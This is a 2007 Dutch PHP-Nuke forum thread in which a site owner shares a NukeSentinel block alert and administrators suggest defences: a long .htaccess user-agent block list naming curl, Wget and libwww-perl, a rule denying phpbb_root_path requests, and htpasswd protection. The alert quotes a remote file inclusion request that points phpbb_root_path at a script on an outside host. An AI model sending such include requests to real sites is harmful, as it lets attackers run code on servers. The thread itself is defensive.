PHP Nuke Nederland
 
•   Home  •  Downloads  •  Your Account  •  Forums  •
PHP-Nuke Nederland: Forums

PHP-Nuke Nederland :: View topic - NukeSentinel Blocked IP melding - User Agent: libwww-perl
 Forum FAQ  •   Search   •  Memberlist  •  Usergroups   •  Register   •    •  Profile  •  Log in to check your private messages  •  Log in

 
Post new topicReply to topic
View previous topic Log in to check your private messages View next topic
Author Message
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sat 14 Jul 2007 4:27 Reply with quoteBack to top

Krijg deze meldingen wel vaker gestuurd maar ben benieuwd wat ze eigenlijk proberen? Zal wel niet veel soeps zijn, maar moet ik me zorgen maken en kan ik nog iets doen om te verbeteren dat het ze lukt waar ze ook mee bezig zijn?
Ik werk trouwens met NukeSentinel laatste versie.

Date & Time: 2007-07-13 19:28:14 CEST GMT +0200 Blocked IP: 72.232.244.238 User ID: Anonymous (1)
Reason: Abuse-Filter
--------------------
User Agent: libwww-perl/5.805
Query String: www.website.nl/modules/Forums/admin/admin_users.php?phpbb_root_path=http://cbaa.net.au/ty.txt??
Get String: www.website.nl/modules/Forums/admin/admin_users.php?phpbb_root_path=http://cbaa.net.au/ty.txt??
Post String: www.website.nl/modules/Forums/admin/admin_users.php
Forwarded For: none
Client IP: none
Remote Address: 72.232.244.238
Remote Port: 48804
Request Method: GET


Edit: Topic titel gewijzigd, voor de zoekfunctie door BlueLion - Administrator
View user's profileSend private messageVisit poster's website
zeromechanic
Administrator
Administrator


Joined: Oct 01, 2004
Posts: 1527
Location: Emmeloord

PostPosted: Sat 14 Jul 2007 6:56 Reply with quoteBack to top

Dit wijst erop dat Sentinel zn werk doet.

HEt lijkt erop dat ze een "oude"exploit gebruiken om waarschijnlijk zo aan je inlog gevens te komen.
Stelletje kinderen $#@$#$$#$@@$# Evil or Very Mad

Wat je het beste kunt doen, is de blocker op permanent blocken zetten, of de IP adressen handmatig blokkeren.

_________________
Te Lezen: Forum Regels | Te Gebruiken
View user's profileSend private messageVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sat 14 Jul 2007 9:02 Reply with quoteBack to top

Beter is deze user agent niet eens toe te laten op je webruimte.
Voeg het volgende toe in je .htaccess:

Code:

RewriteEngine on

#The next lines check for Email Spammers Robots and redirect them to a fake page
RewriteCond %{HTTP_USER_AGENT} @yahoo.com                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alexibot                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} alligator                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} anonymiz                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} asterias                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} backdoorbot                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} black\ hole                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^BlackWidow                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} blowfish                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} botalot                      [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Bot\ mailto:craftbot@yahoo.com    [NC,OR]
RewriteCond %{HTTP_USER_AGENT} builtbottough               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bullseye                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} bunnyslippers               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} catch                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cegbfeieh                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} charon                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cheesebot                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cherrypicker                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ChinaClaw                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} combine                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} copyrightcheck               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} cosmos                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} crescent                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} curl                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Custo                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dbrowse                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^DISCo                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dittospyder                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dlman                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dnloadmage                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} download                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Download\ Demon               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dreampassport               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dts\ agent                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^eCatch                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} eirgrabber                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EirGrabber                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailSiphon                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EmailWolf                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} erocrawler                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} express\ webpictures            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} extractorpro                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Express\ WebPictures         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ExtractorPro               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^EyeNetIE                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fantombrowser               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fantomcrew\ browser            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fileheap                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} filehound                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^FlashGet                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} foobot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} franklin\ locator            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} freshdownload               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fscrawler                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} gamespy_arcade               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} getbot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetRight                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GetWeb!                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Go!Zilla                  [OR]
RewriteCond %{HTTP_USER_AGENT} ^Go-Ahead-Got-It               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} grab                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^GrabNet                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Grafula                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} gsa-crawler                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} harvest                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} hloader                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^HMView                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httplib                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} httpresume                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} HTTrack                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} humanlinks                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} igetter                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Stripper               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Image\ Sucker               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} industry\ program            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Indy\ Library               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} infonavirobot               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} installshield\ digitalwizard      [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^InterGET                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Internet\ Ninja               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iria                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} irvine                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iupui\ research\ bot            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbh\ agent                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jennybot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JetCar                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jobo                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} joc                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^JOC\ Web\ Spider            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kapere                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} kenjin\ spider               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} keyword\ density               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^larbin                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^LeechFTP                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} leechget                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lexibot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libweb/clshttp               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwww-perl                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lightningdownload            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lincoln\ state\ web\ browser      [NC,OR]
RewriteCond %{HTTP_USER_AGENT} linkextractorpro               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} linkscan/8\.1a\.unix            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} linkwalker                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp-trivial                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp::simple                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mac\ finder                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mass\ Downloader            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mata\ hari                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mediasearch                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} metaproducts                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} microsoft\ url\ control         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} midown\ tool                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^MIDown\ tool               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} miixpc                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} missauga\ locate               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} missouri\ college\ browse      [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Mister\ PiX                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} moget                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mozilla.*newt               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^mozilla/3\.0\ \(compatible\)   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mozilla/3\.mozilla/2\.01         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} msie\ 4\.0\ \(win95\)         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} multiblocker\ browser         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mydaemon                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} mygetright                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nabot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Navroad                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NearSite                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetAnts                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetSpider                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Net\ Vampire               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netants                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netmechanic                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netpumper                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} netspider                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^NetZIP                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} newsearchengine               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nicerspro                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ninja                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nitro\ downloader            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} npbot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Octopus                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Explorer            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Offline\ Navigator            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} openfind                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^PageGrabber                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Papa\ Foto                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pavuk                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pbrowse                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^pcBrowser                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} peval                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} pompos/                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} program\ shareware            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} propowerbot                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} prowebwalker                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} psurf                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} puf                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} puxarapido                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} queryn\ metasearch            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^RealDownload               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^ReGet                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} repomonkey                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} rsurf                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} rumours-agent               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sakura                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} scan4mail                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} semanticdiscovery            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SiteSnagger                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} slysearch                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SmartDownload               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} spankbot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} spanner                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} spiderzilla                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} sq\ webscanner               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} stamina                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} star\ downloader               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} steeler                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} strip                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperBot                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^SuperHTTP                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Surfbot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} suzuran                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} swbot                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} szukacz                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^tAkeOut                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} teleport                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Teleport\ Pro               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} telesoft                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} test\ spider                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} the\ intraformant            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} thenomad                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tighttwatbot                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} titan                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tocrawl/urldispatcher         [NC,OR]
RewriteCond %{HTTP_USER_AGENT} true_robot                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} tsurf                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} turing\ machine               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} turingos                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} urlblaze                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} urlgetfile                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} urly\ warning               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} utilmind                     [NC,OR]
RewriteCond %{HTTP_USER_AGENT} vci                        [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^VoidEYE                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Image\ Collector            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Web\ Sucker               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebAuto                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webbandit                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webcapture                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webcollage                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebCopier                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webenhancer               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebFetch                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebGo\ IS                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebLeacher               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webmasterworldforumbot            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webql                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebReaper                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebSauger                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ eXtractor            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Website\ Quester            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webster                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebStripper               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebWhacker               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wep\ search               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WebZIP                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Wget                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whizbang                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Widow                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} wildsoft\ surfer               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} www-collector-e               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} www\.netwu\.com               [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^WWWOFFLE                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xaldon                  [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Xaldon\ WebSpider            [NC,OR]
RewriteCond %{HTTP_USER_AGENT} xenu                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^Zeus                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ziggy                   [NC,OR]
RewriteCond %{HTTP_USER_AGENT} zippy                   [NC]
RewriteRule ^.* -                            [F,L]


BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sat 14 Jul 2007 17:53 Reply with quoteBack to top

Oke Zeromechanic/Blue Lion,

ik heb dus permanent blocken al aanstaan, maar Sentinel blockt ze niet?Komt dat omdat ik onderstaande dingen nog niet had ingevuld? Maar waar BL nu mee komt had ik niet aanstaan omdat ik niet wist waar het voor is? kun je me dat eens uitleggen?

Als je dit wilt aanzetten staan er ook van die waarschuwingen bij zoals dat je paswoord ingevuld moet zijn! Heb dit nu gedaan en als ik het goed begrijp gaan deze instellingen dus kijken in een lijst met geblokkeerde ip's ofzo, klopt dat?
Ik ga nu deze instellingen dus ook maar aanzetten zoals htaccess, staaccess, ftaccess. Wat is het verschil hier tussen......

Maar ik heb eens gekeken naar de path's die erbij staan maar dat klopt bij mij niet volgens mij? En staaccess en ftaccess kan ik helemaal niet vinden volgens mij? Of kijk ik daar overheen zeker? Dus als je me eens uit kunt leggen hoe dit in te vullen ben ik wederom een gelukkig mens Razz

Na even gegoogled te hebben vond ik dit, klopt het wat hierin staat? Als dat zo is heb ik denk ik een klein probleem. Mijn htaccess file staat in mijn hoofddir en niet zoals Nuke Sentinel aangeeft in:

Normally: /home/aquarium/public_html/at/.htaccess

Dit is het stuk wat ik vond bij Google, wat erbij staat van telnet en een dir aanmaken moet je overheen lezen omdat dit niet nodig is:

De directory aanmaken
De eerste stap die je moet nemen, is het aanmaken van de directory die je wilt beveiligen. Als je al eerder een directory hebt gemaakt die je wilt beveiligen dan kun je deze stap overslaan.

Je kunt een directory aanmaken vanuit Telnet, maar voor het gemak kun je het ook nog gewoon met je FTP programma doen. Maak dus nu de nieuwe directory die je wilt gaan beveiligen. In de rest van dit artikel noem ik deze directory beveiligd. In de codes hieronder moet je deze naam dus vervangen door de naam die je aan je eigen directory hebt gegeven.

Het .htaccess bestand maken
De tweede stap is om het .htaccess bestand te maken. Je kunt dit ook weer vanuit Telnet doen met een programma als Pico of VI, maar hier bespreek ik hoe je dit met een gewone teksteditor op je eigen systeem kunt doen.

Open dus in je favoriete teksteditor een nieuw tekstbestand (.txt)

Kopieer en plak daarin de volgende code:

AuthUserFile /usr/www/beveiligd/.htpasswd
AuthGroupFile /dev/null
AuthName "Geheime Pagina"
AuthType Basic
<Limit GET POST>
require valid-user
</Limit>

In de code hierboven moet je nog twee dingen aanpassen:

Bij AuthUserFile moet je het pad naar de directory die je wilt beveiligen invullen. Als je niet weet wat het pad precies is dan kun je dat meestal nagaan via je FTP programma of door op de site van je webhost te kijken.
Waar ik hierboven Geheime Pagina heb getypt, moet je de titel invullen die je aan het wachtwoord-venster wilt geven. Bezoekers krijgen deze titel dan te zien (zie ook het plaatje hierboven).
Als je dit gedaan hebt dan moet je het .htaccess bestand uploaden naar de directory die je wilt beveiligen. Plaats het dus niet in de hoofddirectory van je site, anders wordt je hele site beveiligd en kan geen enkele bezoeker er meer inkomen zonder gebruikersnaam en wachtwoord.

Nu moet je alleen het .htaccess bestand nog even hernoemen. Meestal kan dat door het bestand in je FTP programma te selecteren en dan op de rechtermuisknop te klikken. Kies dan voor een optie als Rename file of iets dergelijks. Verander dan .htaccess.txt in .htaccess, dus zonder een extensie!

Het .htpasswd bestand maken
Nu het .htaccess bestand op zijn plaats staat, is het tijd om het .htpasswd bestand te gaan maken.

Om dat te kunnen doen moet je Telnet of SSH-toegang tot je webserver hebben. Je kunt gebruik maken van Telnet via de functie "uitvoeren" in Windows. Dit vind je onder de Start-knop. Type in het volgende venster:
telnet www.jedomeinnaam.nl.

Vervolgens moet je de gebruikersnaam en het wachtwoord die je van je webhost hebt gekregen invoeren. Voor meer informatie over Telnet kun je het beste even op de site van je webhost kijken.

Het kan zijn dat het gebruik van Telnet niet is toegestaan door je webhost, maar dat je wel via Secure Shell (SSH) de server mag benaderen. In dat geval moet je een geschikte client downloaden. Ik kan je aanraden om Putty te gebruiken (gratis). Het is verder niet moeilijk om verbinding te maken met de server. Het meeste wijst zich vanzelf. Als er nog onduidelijkheden zijn dan kun je het beste de documentatie op de site van Putty bekijken of weer bij je webhost kijken of informeren.

Goed, ik ga ervan uit dat je nu verbinding met de server hebt gemaakt via Telnet of SSH. Doorloop nu de volgende stappen om het .htpasswd bestand te maken.

Kijk eerst waar je bent. Type daarvoor het commando pwd en druk op enter. Als je al in de directory zit die je wilt beveiligen dan kun je door naar de volgende stap. Anders moet je eerst naar deze directory toe gaan. Dat doe je door cd beveiligd te typen. Natuurlijk vervang je "beveiligd" weer door de naam die je eerder aan de te beveiligen directory hebt gegeven.
Nu je in de te beveiligen directory zit, moet je het volgende commando typen (alleen de eerste keer!) om het .htpasswd aan te maken:
htpasswd -c .htpasswd gebruikersnaam
("gebruikernaam" moet je vervangen door de gebruikersnaam die je toegang wilt geven tot de beveiligde directory).
Vervolgens zal de server je vragen om een password op te geven voor deze gebruiker. Vul daar dus een wachtwoord in. Je moet dit vervolgens nog een keer bevestigen.
Als je nieuwe gebruikers toe wilt voegen die ook toegang tot de directory moeten krijgen dan moet je het volgende commando gebruiken:
htpasswd .htpasswd nieuwe_gebruikersnaam
Tot slot
Dat was het! Nu kun je eenvoudig directories beveiligen en nieuwe gebruikers toevoegen. Als je het .htaccess bestand op een gegeven moment weer wilt verwijderen dan kan dat door vanuit telnet/SSH rm .htaccess te typen. Je kunt dit trouwens ook weer makkelijk via je FTP programma doen.
View user's profileSend private messageVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sat 14 Jul 2007 19:17 Reply with quoteBack to top

Een .htaccess bestand staat los van Sentinel. Wat ik gepost heb kan je dus gebruiken zonder dat je Sentinel hiervoor instelt. Sentinel maakt alleen gebruik van het .htaccess bestand en slaat hierin gegevens op, zoals IP adressen die geen toegang hebben tot je website/webspace.

Het bestand .staccess wordt gebruikt om een gecodeerd password, die toegang geeft tot je admin panel, op te slaan. Dit is een extra authenticatie, een extra beveiliging.
Probeer de link naar mijn admin panel op deze website te benaderen, hiervoor achter de url nog admin.php zetten.


BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
mastermark
Junior Support
Junior Support


Joined: Sep 10, 2006
Posts: 150

PostPosted: Sun 15 Jul 2007 1:25 Reply with quoteBack to top

zoek in je .htaccess
Code:
RewriteEngine on


plak eronder
Code:

RewriteCond %{THE_REQUEST} (phpbb_root_path)

_________________
Mijn Portfolio
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.3!
Aanbevolen Security AddOn: Nuke Sentinel™ 2.5.15

View user's profileSend private messageSend e-mailVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sun 15 Jul 2007 1:34 Reply with quoteBack to top

Dat is half werk, Mastermark.
Bovendien, alhoewel het goed is, gebruik je

Code:

RewriteEngine on


alleen als dit standaard uit staat.

De rewrite conditie die ik meegeef in bovenstaand, zorgt ervoor dat deze bekende dataminers alle toegang wordt ontzegt tot je website.

Voor overige kwaad willende heb je wel gelijk, en is elke request voor het forum pad direct een aanleiding om die toegang te ontzeggen.


BL

_________________
Te Lezen: Forum Regels | Te Gebruiken: Forum Zoek Functie
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.1!
Aanbevolen Security AddOn: Nuke Sentinel™
View user's profileSend private messageSend e-mailVisit poster's website
mastermark
Junior Support
Junior Support


Joined: Sep 10, 2006
Posts: 150

PostPosted: Sun 15 Jul 2007 1:36 Reply with quoteBack to top

ik heb ook een hele lijst ip adressen van badbots enz....
ik zal het ff in me .htaccess plakken

_________________
Mijn Portfolio
Aanbevolen PHP-Nuke versie: PHP-Nuke 7.6pl3.3!
Aanbevolen Security AddOn: Nuke Sentinel™ 2.5.15

View user's profileSend private messageSend e-mailVisit poster's website
cobra_gerard
Gevorderd
Gevorderd


Joined: Nov 18, 2006
Posts: 127
Location: Rijsbergen

PostPosted: Sun 15 Jul 2007 18:15 Reply with quoteBack to top

Ben net eens gaan zoeken en tot mijn verrassing vind ik 2 htaccess bestanden?
Eentje in de root van mijn site die helemaal leeg is en eentje in de map abuse in de directory waar mijn site draait, daar staat alleen in allow all. Dus welke moet ik nu nemen vraag ik me af en wat moet ik nu in dit bestand zetten? En moet ik ook in Sentinel dan het path invoeren of niet? En het bestand staaccess als ik in Sentinel de setup aanklik krijg ik een melding:

Save this in :

# -------------------------------------------
# Start of NukeSentinel(tm) admin.php Auth
# -------------------------------------------
<Files >
deny from all
</Files>

<Files admin.php>
<Limit GET POST PUT>
require valid-user
</Limit>
AuthName "Restricted by NukeSentinel(tm)"
AuthType Basic
AuthUserFile
</Files>
# -------------------------------------------
# End of NukeSentinel(tm) admin.php Auth
# -------------------------------------------

wat moet ik hiermee doen? Moet ik dit zetten in de map Abuse in het htaccess bestand?

@BL

heb net je admin.php gevolgd en krijg dan een pop up met de melding dat dit beveilgd is! Is wel een stuk veiliger ja Shocked
View user's profileSend private messageVisit poster's website
BlueLion
Administrator
Administrator


Joined: Aug 21, 2004
Posts: 2836

PostPosted: Sun 15 Jul 2007 20:16 Reply with quoteBack to top

cobra_gerard wrote:
Ben net eens gaan zoeken en tot mijn verrassing vind ik 2 htaccess bestanden?
